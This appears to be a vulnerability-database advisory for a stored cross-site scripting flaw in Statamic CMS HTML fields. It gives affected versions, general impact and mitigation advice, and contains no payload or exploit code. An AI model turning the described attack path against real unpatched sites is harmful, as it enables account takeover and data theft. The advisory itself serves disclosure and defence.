CVE-2026-27196
Stored XSS in Statamic HTML Fields Allows Privilege Escalation
Publication date: 2026-02-21
Last updated on: 2026-03-30
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| statamic | statamic | to 5.73.9 (exc) |
| statamic | statamic | From 6.0.0 (inc) to 6.3.2 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a Stored Cross-Site Scripting (XSS) issue in the Statamic content management system (CMS), specifically affecting the HTML fieldtypes. Authenticated users who have permissions to manage fields can inject malicious JavaScript code into the HTML content. When higher-privileged users view this content, the malicious script executes in their browsers, potentially compromising their accounts or data.
The vulnerability exists in Statamic versions 5.73.8 and below, as well as versions 6.0.0-alpha.1 through 6.3.1. It has been fixed in versions 6.3.2 and 5.73.9 by introducing HTML sanitization using the DOMPurify library, which cleanses the HTML content before rendering it.
How can this vulnerability impact me? :
This vulnerability can allow attackers with field management permissions to inject malicious JavaScript code that executes in the browsers of higher-privileged users. This can lead to unauthorized actions such as session hijacking, data theft, or performing actions on behalf of the victim user.
Because the attack is stored, the malicious code persists in the system and triggers whenever the affected content is viewed, increasing the risk and potential impact.
The vulnerability has a high severity score (CVSS 8.1) indicating significant confidentiality and integrity impacts, though it does not affect availability.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
I don't know
What immediate steps should I take to mitigate this vulnerability?
To mitigate the Stored XSS vulnerability in Statamic CMS versions 5.73.8 and below and 6.0.0-alpha.1 through 6.3.1, you should upgrade to version 6.3.2 or 5.73.9 where the issue is fixed.
The fix involves sanitizing HTML content in the HTML fieldtype using the DOMPurify library to prevent malicious JavaScript injection.
Ensure that the HTML fieldtype configuration has sanitization enabled (which is the default setting) to automatically cleanse HTML input before rendering.